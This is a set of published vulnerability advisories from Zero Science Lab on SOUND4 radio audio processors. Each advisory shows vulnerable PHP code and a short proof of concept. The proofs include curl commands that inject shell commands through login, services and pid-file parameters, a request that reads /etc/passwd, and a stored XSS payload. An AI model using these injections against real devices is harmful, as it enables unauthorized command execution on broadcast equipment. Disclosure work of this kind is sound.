<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (traceroute.php) Conditional Command Injection<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Summary: The SOUND4 IMPACT introduces an innovative process - mono and<br />stereo parts of the signal are processed separately to obtain perfect<br />consistency in terms of both sound and level. Therefore, in moving<br />reception, when the FM receiver switches from stereo to mono and back to<br />stereo, the sound variations and changes in level are reduced by over 90%.<br />In the SOUND4 IMPACT processing chain, the stereo expander can be used<br />substantially without any limitations.<br /><br />With its advanced functionalities and impressive versatility, SOUND4<br />PULSE gives clients the ultimate price - performance ratio, providing<br />much more than just a processor. Flexible and powerful, it ensures perfect<br />sound quality and full compatibility with radio broadcasting standards<br />and can be used simultaneously for FM and HD, DAB, DRM or streaming.<br /><br />SOUND4 FIRST provides all the most important functionalities you need<br />in an FM/HD processor and sets the bar high both in terms of performance<br />and affordability. Designed to deliver a sound of uncompromising quality,<br />this tool gives you 2-band processing, a digital stereo generator and an<br />IMPACT Clipper.<br /><br />Desc: This vulnerability allows a local authenticated user to create a<br />file in the /tmp directory that contains malicious commands. The file<br />must have the filename ending with .traceroute.pid, and the commands in<br />the file can only be executed once by an external unauthenticated attacker.<br />By calling the vulnerable script and making a single HTTP POST request,<br />the attacker can gain command execution on the system. After the request<br />is made, the file containing the malicious commands will be deleted.<br /><br />-------------------------------------------------------------------------<br />/var/www/traceroute.php:<br />------------------------<br />02: if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['traceroute_host']) && isset($_POST['networkid'])) {<br />03: $pidfilename="/tmp/" . $_POST['networkid'] . ".traceroute.pid";<br />04: if( file_exists($pidfilename)) {<br />05: $procid=file_get_contents($pidfilename);<br />06: shell_exec("pkill -P ".$procid);<br />07: }<br />...<br />...<br />29: unlink($pidfilename);<br />30: exit();<br />-------------------------------------------------------------------------<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5740<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5740.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />#On the server<br />> echo ";id>/var/www/b" > /tmp/251.traceroute.pid<br /><br />#External<br />> curl -XPOST -sk https://RADIO/traceroute.php --data "traceroute_host=t00t&networkid=251"<br />> curl -XPOST -sk https://RADIO/b<br />uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)<br /></code></pre>
<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (username) Unauthenticated Command Injection<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Summary: The SOUND4 IMPACT introduces an innovative process - mono and<br />stereo parts of the signal are processed separately to obtain perfect<br />consistency in terms of both sound and level. Therefore, in moving<br />reception, when the FM receiver switches from stereo to mono and back to<br />stereo, the sound variations and changes in level are reduced by over 90%.<br />In the SOUND4 IMPACT processing chain, the stereo expander can be used<br />substantially without any limitations.<br /><br />With its advanced functionalities and impressive versatility, SOUND4<br />PULSE gives clients the ultimate price - performance ratio, providing<br />much more than just a processor. Flexible and powerful, it ensures perfect<br />sound quality and full compatibility with radio broadcasting standards<br />and can be used simultaneously for FM and HD, DAB, DRM or streaming.<br /><br />SOUND4 FIRST provides all the most important functionalities you need<br />in an FM/HD processor and sets the bar high both in terms of performance<br />and affordability. Designed to deliver a sound of uncompromising quality,<br />this tool gives you 2-band processing, a digital stereo generator and an<br />IMPACT Clipper.<br /><br />Desc: The application suffers from an unauthenticated OS command injection<br />vulnerability. This can be exploited to inject and execute arbitrary shell<br />commands through the 'username' HTTP POST parameter through index.php and<br />login.php script.<br /><br />========================================================================<br />/var/www/login.php:<br />-------------------<br />09: if (isset($_POST['username']) && isset($_POST['password'])) {<br />10:<br />11: $ret = -1;<br />12: // remarque: Check Password for broken, only admin/admin as valid user/password<br />13: exec('echo ' . $_POST['password'] . ' | /opt/sound4/sound4server _check_pwd_ ' .'"'.$_POST['username'].'";',$out,$ret);<br />========================================================================<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5739<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5739.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />> curl --fail -XPOST -sko nul https://RADIOGAGA/index.php --data "username=`id>/var/www/j`&password=ZSL" && curl -sk https://RADIOGAGA/j<br />uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)<br /></code></pre>
<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (password) Unauthenticated Command Injection<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Summary: The SOUND4 IMPACT introduces an innovative process - mono and<br />stereo parts of the signal are processed separately to obtain perfect<br />consistency in terms of both sound and level. Therefore, in moving<br />reception, when the FM receiver switches from stereo to mono and back to<br />stereo, the sound variations and changes in level are reduced by over 90%.<br />In the SOUND4 IMPACT processing chain, the stereo expander can be used<br />substantially without any limitations.<br /><br />With its advanced functionalities and impressive versatility, SOUND4<br />PULSE gives clients the ultimate price - performance ratio, providing<br />much more than just a processor. Flexible and powerful, it ensures perfect<br />sound quality and full compatibility with radio broadcasting standards<br />and can be used simultaneously for FM and HD, DAB, DRM or streaming.<br /><br />SOUND4 FIRST provides all the most important functionalities you need<br />in an FM/HD processor and sets the bar high both in terms of performance<br />and affordability. Designed to deliver a sound of uncompromising quality,<br />this tool gives you 2-band processing, a digital stereo generator and an<br />IMPACT Clipper.<br /><br />Desc: The application suffers from an unauthenticated OS command injection<br />vulnerability. This can be exploited to inject and execute arbitrary shell<br />commands through the 'password' HTTP POST parameter through index.php and<br />login.php script.<br /><br />========================================================================<br />/var/www/login.php:<br />-------------------<br />09: if (isset($_POST['username']) && isset($_POST['password'])) {<br />10:<br />11: $ret = -1;<br />12: // remarque: Check Password for broken, only admin/admin as valid user/password<br />13: exec('echo ' . $_POST['password'] . ' | /opt/sound4/sound4server _check_pwd_ ' .'"'.$_POST['username'].'";',$out,$ret);<br />========================================================================<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5738<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5738.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />> curl --fail -XPOST -sko nul https://RADIOGUGU/index.php --data "username=ZSL&password=`id>/var/www/g`" && curl -sk https://RADIOGUGU/g<br />uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)<br /></code></pre>
<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (services) Authenticated Command Injection<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Summary: The SOUND4 IMPACT introduces an innovative process - mono and<br />stereo parts of the signal are processed separately to obtain perfect<br />consistency in terms of both sound and level. Therefore, in moving<br />reception, when the FM receiver switches from stereo to mono and back to<br />stereo, the sound variations and changes in level are reduced by over 90%.<br />In the SOUND4 IMPACT processing chain, the stereo expander can be used<br />substantially without any limitations.<br /><br />With its advanced functionalities and impressive versatility, SOUND4<br />PULSE gives clients the ultimate price - performance ratio, providing<br />much more than just a processor. Flexible and powerful, it ensures perfect<br />sound quality and full compatibility with radio broadcasting standards<br />and can be used simultaneously for FM and HD, DAB, DRM or streaming.<br /><br />SOUND4 FIRST provides all the most important functionalities you need<br />in an FM/HD processor and sets the bar high both in terms of performance<br />and affordability. Designed to deliver a sound of uncompromising quality,<br />this tool gives you 2-band processing, a digital stereo generator and an<br />IMPACT Clipper.<br /><br />Desc: An authenticated command injection vulnerability exists in the<br />www-data-handler.php script at line 20, where the 'services' HTTP POST<br />parameter is passed as an argument to the system command "/usr/local/bin/www-data-handler.sh --restartsrv".<br />This allows an attacker to inject arbitrary system commands into the<br />'services' parameter, which are then executed by the script with the<br />privileges of the 'www-data' user.<br /><br />========================================================================<br />/var/www/www-data-handler.php:<br />------------------------------<br />18: } else if(isset($_POST['services'])&&$_POST['services']!='') {<br />19: $ret=-1;<br />20: exec("/usr/local/bin/www-data-handler.sh --restartsrv ".$_POST['services'],$out,$ret);<br />21: echo $ret;<br />22: exit;<br />23: }<br />========================================================================<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5737<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5737.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />> curl --fail -XPOST -sko nul \<br /> 'https://RADIOGUGA/www-data-handler.php' \<br /> -H 'Cookie: PHPSESSID=fnlqhsd916g59uob4fgact97bd' \<br /> --data "services=;id>/var/www/m" \<br /> && curl -sk 'https://RADIOGUGA/m'<br />uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)<br /></code></pre>
<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (PHPTail) Unauthenticated File Disclosure<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Summary: The SOUND4 IMPACT introduces an innovative process - mono and<br />stereo parts of the signal are processed separately to obtain perfect<br />consistency in terms of both sound and level. Therefore, in moving<br />reception, when the FM receiver switches from stereo to mono and back to<br />stereo, the sound variations and changes in level are reduced by over 90%.<br />In the SOUND4 IMPACT processing chain, the stereo expander can be used<br />substantially without any limitations.<br /><br />With its advanced functionalities and impressive versatility, SOUND4<br />PULSE gives clients the ultimate price - performance ratio, providing<br />much more than just a processor. Flexible and powerful, it ensures perfect<br />sound quality and full compatibility with radio broadcasting standards<br />and can be used simultaneously for FM and HD, DAB, DRM or streaming.<br /><br />SOUND4 FIRST provides all the most important functionalities you need<br />in an FM/HD processor and sets the bar high both in terms of performance<br />and affordability. Designed to deliver a sound of uncompromising quality,<br />this tool gives you 2-band processing, a digital stereo generator and an<br />IMPACT Clipper.<br /><br />Desc: The application suffers from an unauthenticated file disclosure<br />vulnerability. Using the 'file' GET parameter attackers can disclose<br />arbitrary files on the affected device and disclose sensitive and system<br />information.<br /><br />========================================================================<br />/usr/cgi-bin/loghandler.php:<br />----------------------------<br />05: require 'phptail.php';<br />06: /**<br />07: * Initilize a new instance of PHPTail<br />08: * @var PHPTail<br />09: */<br />10: if(isset($_GET['file'])) {<br />11: $file=$_GET['file'];<br />12: $file_display=$_GET['file_display'];<br />13: } else {<br />14: $file=getenv("PATH_TRANSLATED");<br />15: $file_display="SOUND4 Log: " . getenv("PATH_INFO");<br />16: }<br />17: $tail = new PHPTail($file, $file_display);<br /><br />========================================================================<br />/usr/cgi-bin/phptail.php:<br />-------------------------<br />71: $data = array();<br />72: if($maxLength > 0) {<br />73:<br />74: $fp = fopen($this->log, 'r');<br />75: fseek($fp, -$maxLength , SEEK_END);<br />76: $data = explode("\n", fread($fp, $maxLength));<br />77:<br />78: }<br />79: /**<br />80: * If the last entry in the array is an empty string lets remove it.<br />81: */<br />82: if(end($data) == "") {<br />83: array_pop($data);<br />84: }<br />85: return json_encode(array("size" => $fsize, "data" => $data));<br />========================================================================<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5736<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5736.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />> curl -k "https://RADIOGAGA/cgi-bin/loghandler.php?ajax=251&file=/mnt/old-root/etc/passwd" | python -m json.tool<br />{<br /> "size": 519,<br /> "data": [<br /> "root:x:0:0:root:/root:/bin/sh",<br /> "daemon:x:1:1:daemon:/usr/sbin:/bin/false",<br /> "bin:x:2:2:bin:/bin:/bin/false",<br /> "sys:x:3:3:sys:/dev:/bin/false",<br /> "sync:x:4:100:sync:/bin:/bin/sync",<br /> "mail:x:8:8:mail:/var/spool/mail:/bin/false",<br /> "www-data:x:33:33:www-data:/var/www:/bin/false",<br /> "operator:x:37:37:Operator:/var:/bin/false",<br /> "nobody:x:99:99:nobody:/home:/bin/false",<br /> "sound4:x:1000:1000::/home/sound4:/bin/sh",<br /> "avahi:x:1001:1001::/:/bin/false",<br /> "dbus:x:1002:1002:DBus messagebus user:/var/run/dbus:/bin/false",<br /> "sshd:x:1003:1004:SSH drop priv user:/:/bin/false"<br /> ]<br />}<br /></code></pre>
<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (ping.php) Conditional Command Injection<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Summary: The SOUND4 IMPACT introduces an innovative process - mono and<br />stereo parts of the signal are processed separately to obtain perfect<br />consistency in terms of both sound and level. Therefore, in moving<br />reception, when the FM receiver switches from stereo to mono and back to<br />stereo, the sound variations and changes in level are reduced by over 90%.<br />In the SOUND4 IMPACT processing chain, the stereo expander can be used<br />substantially without any limitations.<br /><br />With its advanced functionalities and impressive versatility, SOUND4<br />PULSE gives clients the ultimate price - performance ratio, providing<br />much more than just a processor. Flexible and powerful, it ensures perfect<br />sound quality and full compatibility with radio broadcasting standards<br />and can be used simultaneously for FM and HD, DAB, DRM or streaming.<br /><br />SOUND4 FIRST provides all the most important functionalities you need<br />in an FM/HD processor and sets the bar high both in terms of performance<br />and affordability. Designed to deliver a sound of uncompromising quality,<br />this tool gives you 2-band processing, a digital stereo generator and an<br />IMPACT Clipper.<br /><br />Desc: This vulnerability allows a local authenticated user to create a<br />file in the /tmp directory that contains malicious commands. The file<br />must have the filename ending with .ping.pid, and the commands in the<br />file can only be executed once by an external unauthenticated attacker.<br />By calling the vulnerable script and making a single HTTP POST request,<br />the attacker can gain command execution on the system. After the request<br />is made, the file containing the malicious commands will be deleted.<br /><br />-------------------------------------------------------------------------<br />/var/www/ping.php:<br />------------------<br />02: if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['ping_host']) && isset($_POST['networkid'])) {<br />03: $pidfilename="/tmp/" . $_POST['networkid'] . ".ping.pid";<br />04: if( file_exists($pidfilename)) {<br />05: $procid=file_get_contents($pidfilename);<br />06: shell_exec("pkill -P ".$procid);<br />07: }<br />...<br />...<br />29: unlink($pidfilename);<br />30: exit();<br />-------------------------------------------------------------------------<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5735<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5735.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />#On the server<br />> echo ";id>/var/www/b" > /tmp/251.ping.pid<br /><br />#External<br />> curl -XPOST -sk https://RADIO/ping.php --data "ping_host=r00t&networkid=251"<br />> curl -XPOST -sk https://RADIO/b<br />uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)<br /></code></pre>
<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Unauthenticated Radio Stream Disclosure<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Summary: The SOUND4 IMPACT introduces an innovative process - mono and<br />stereo parts of the signal are processed separately to obtain perfect<br />consistency in terms of both sound and level. Therefore, in moving<br />reception, when the FM receiver switches from stereo to mono and back to<br />stereo, the sound variations and changes in level are reduced by over 90%.<br />In the SOUND4 IMPACT processing chain, the stereo expander can be used<br />substantially without any limitations.<br /><br />With its advanced functionalities and impressive versatility, SOUND4<br />PULSE gives clients the ultimate price - performance ratio, providing<br />much more than just a processor. Flexible and powerful, it ensures perfect<br />sound quality and full compatibility with radio broadcasting standards<br />and can be used simultaneously for FM and HD, DAB, DRM or streaming.<br /><br />SOUND4 FIRST provides all the most important functionalities you need<br />in an FM/HD processor and sets the bar high both in terms of performance<br />and affordability. Designed to deliver a sound of uncompromising quality,<br />this tool gives you 2-band processing, a digital stereo generator and an<br />IMPACT Clipper.<br /><br />Desc: The application suffers from an unauthenticated live stream disclosure<br />when webplay or ffmpeg scripts are called.<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5734<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5734.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />1. https://RADIO/webplay/mp3/128<br />2. https://RADIO/cgi-bin/ffmpeg.cgi?codec=mp3&bitrate=128<br /></code></pre>
<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (dns.php) Conditional Command Injection<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Summary: The SOUND4 IMPACT introduces an innovative process - mono and<br />stereo parts of the signal are processed separately to obtain perfect<br />consistency in terms of both sound and level. Therefore, in moving<br />reception, when the FM receiver switches from stereo to mono and back to<br />stereo, the sound variations and changes in level are reduced by over 90%.<br />In the SOUND4 IMPACT processing chain, the stereo expander can be used<br />substantially without any limitations.<br /><br />With its advanced functionalities and impressive versatility, SOUND4<br />PULSE gives clients the ultimate price - performance ratio, providing<br />much more than just a processor. Flexible and powerful, it ensures perfect<br />sound quality and full compatibility with radio broadcasting standards<br />and can be used simultaneously for FM and HD, DAB, DRM or streaming.<br /><br />SOUND4 FIRST provides all the most important functionalities you need<br />in an FM/HD processor and sets the bar high both in terms of performance<br />and affordability. Designed to deliver a sound of uncompromising quality,<br />this tool gives you 2-band processing, a digital stereo generator and an<br />IMPACT Clipper.<br /><br />Desc: This vulnerability allows a local authenticated user to create a<br />file in the /tmp directory that contains malicious commands. The file<br />must have the filename ending with .dns.pid, and the commands in the<br />file can only be executed once by an external unauthenticated attacker.<br />By calling the vulnerable script and making a single HTTP POST request,<br />the attacker can gain command execution on the system. After the request<br />is made, the file containing the malicious commands will be deleted.<br /><br />-------------------------------------------------------------------------<br />/var/www/dns.php:<br />-----------------<br />02: if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['dns_host']) && isset($_POST['networkid'])) {<br />03: $pidfilename="/tmp/" . $_POST['networkid'] . ".dns.pid";<br />04: if( file_exists($pidfilename)) {<br />05: $procid=file_get_contents($pidfilename);<br />06: shell_exec("pkill -P ".$procid);<br />07: }<br />...<br />...<br />29: unlink($pidfilename);<br />30: exit();<br />-------------------------------------------------------------------------<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5733<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5733.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />#On the server<br />> echo ";id>/var/www/b" > /tmp/251.dns.pid<br /><br />#External<br />> curl -XPOST -sk https://RADIO/dns.php --data "dns_host=m00t&networkid=251"<br />> curl -XPOST -sk https://RADIO/b<br />uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)<br /></code></pre>
<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (Index of /log) Information Disclosure<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Summary: The SOUND4 IMPACT introduces an innovative process - mono and<br />stereo parts of the signal are processed separately to obtain perfect<br />consistency in terms of both sound and level. Therefore, in moving<br />reception, when the FM receiver switches from stereo to mono and back to<br />stereo, the sound variations and changes in level are reduced by over 90%.<br />In the SOUND4 IMPACT processing chain, the stereo expander can be used<br />substantially without any limitations.<br /><br />With its advanced functionalities and impressive versatility, SOUND4<br />PULSE gives clients the ultimate price - performance ratio, providing<br />much more than just a processor. Flexible and powerful, it ensures perfect<br />sound quality and full compatibility with radio broadcasting standards<br />and can be used simultaneously for FM and HD, DAB, DRM or streaming.<br /><br />SOUND4 FIRST provides all the most important functionalities you need<br />in an FM/HD processor and sets the bar high both in terms of performance<br />and affordability. Designed to deliver a sound of uncompromising quality,<br />this tool gives you 2-band processing, a digital stereo generator and an<br />IMPACT Clipper.<br /><br />Desc: The application is vulnerable to sensitive directory indexing /<br />information disclosure vulnerability. An unauthenticated attacker can<br />visit the log directory and disclose the server's log files containing<br />sensitive and system information.<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5732<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5732.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />> curl -k "https://RADIO/log/<br /></code></pre>
<pre><code><br />SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (username) Stored Cross-Site Scripting<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: FM/HD Radio Processing:<br /> Impact/Pulse/First (Version 2: 1.1/2.15)<br /> Impact/Pulse/First (Version 1: 2.1/1.69)<br /> Impact/Pulse Eco 1.16<br /> Voice Processing:<br /> BigVoice4 1.2<br /> BigVoice2 1.30<br /> Web-Audio Streaming:<br /> Stream 1.1/2.4.29<br /> Watermarking:<br /> WM2 (Kantar Media) 1.11<br /><br />Summary: The SOUND4 IMPACT introduces an innovative process - mono and<br />stereo parts of the signal are processed separately to obtain perfect<br />consistency in terms of both sound and level. Therefore, in moving<br />reception, when the FM receiver switches from stereo to mono and back to<br />stereo, the sound variations and changes in level are reduced by over 90%.<br />In the SOUND4 IMPACT processing chain, the stereo expander can be used<br />substantially without any limitations.<br /><br />With its advanced functionalities and impressive versatility, SOUND4<br />PULSE gives clients the ultimate price - performance ratio, providing<br />much more than just a processor. Flexible and powerful, it ensures perfect<br />sound quality and full compatibility with radio broadcasting standards<br />and can be used simultaneously for FM and HD, DAB, DRM or streaming.<br /><br />SOUND4 FIRST provides all the most important functionalities you need<br />in an FM/HD processor and sets the bar high both in terms of performance<br />and affordability. Designed to deliver a sound of uncompromising quality,<br />this tool gives you 2-band processing, a digital stereo generator and an<br />IMPACT Clipper.<br /><br />Desc: The application suffers from an unauthenticated stored XSS vulnerability<br />that results in stored JS code and authentication bypass. The issue is triggered<br />when input passed to the 'username' parameter is not properly sanitized before<br />being returned to the user. This can be exploited to execute arbitrary HTML<br />and script code in a user's browser session in context of an affected site.<br /><br />Tested on: Apache/2.4.25 (Unix)<br /> OpenSSL/1.0.2k<br /> PHP/7.1.1<br /> GNU/Linux 5.10.43 (armv7l)<br /> GNU/Linux 4.9.228 (armv7l)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5731<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5731.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />POST /index.php HTTP/1.1<br /><br />username="><script>confirm(251)</script>&password=zeroscience"<br /></code></pre>